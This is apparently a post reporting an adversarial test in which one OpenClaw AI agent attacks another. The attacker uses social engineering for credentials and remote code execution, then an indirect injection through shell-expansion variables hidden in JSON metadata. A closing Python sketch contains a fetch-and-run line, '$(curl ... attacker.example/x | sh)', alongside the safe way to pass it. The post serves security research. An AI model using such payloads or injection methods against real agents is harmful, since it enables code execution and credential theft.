What happens when OpenClaw agents attack each other?
We ran a live adversarial security test between two autonomous AI agents built on OpenClaw. One agent acted as a red-team attacker; the other acted as a standard defensive agent.

No humans were involved once the session started. The agents communicated directly over webhooks with real credentials and tooling access.

The goal was to test three risk dimensions that tend to break autonomous systems in practice: access, exposure, and agency.

The attacker first attempted classic social engineering. It offered a "helpful" security pipeline that hid a remote code execution payload and requested credentials. The defending agent correctly identified the intent and blocked execution.

The attacker then pivoted to an indirect attack. Instead of asking the agent to run code, it asked the agent to review a JSON document with hidden shell expansion variables embedded in its metadata. This payload was delivered successfully and is still under analysis.

The main takeaway is that direct attacks are relatively easy to defend against. Indirect execution paths through documents, templates, and memory are much harder.

This report is not a claim of safety. It is an observability exercise intended to surface real failure modes in agent-to-agent interaction, which we expect to become common as autonomous systems are deployed more widely.

Full report here:
https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/

Happy to answer technical questions about the setup, methodology, or findings.
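To make the indirect attack concrete, here is a minimal sketch of how a shell expansion variable hidden in JSON metadata can become an execution path. The document contents, field names, and URL below are hypothetical illustrations, not the actual payload from the audit; the point is that the danger appears only when an agent interpolates the field into a shell command.

```python
import json
import subprocess

# Hypothetical document resembling the attack shape: the payload hides
# in an innocuous-looking metadata field, not in anything that reads as code.
doc = json.loads("""
{
  "title": "quarterly report",
  "metadata": {
    "author": "$(curl -s https://attacker.example/x | sh)"
  }
}
""")

author = doc["metadata"]["author"]

# UNSAFE: if an agent builds a shell command by string interpolation and
# runs it with shell=True, the $( ... ) expands and the hidden command runs.
unsafe_cmd = f'echo "Reviewed by: {author}"'
# subprocess.run(unsafe_cmd, shell=True)  # would execute the payload

# SAFER: pass arguments as a list with no shell involved, so $( ... )
# is treated as literal text and nothing expands.
safe = subprocess.run(
    ["echo", f"Reviewed by: {author}"],
    capture_output=True, text=True,
)
print(safe.stdout.strip())
```

The difference between the two paths is invisible at the document level, which is why document review is a harder surface to defend than a direct "run this code" request.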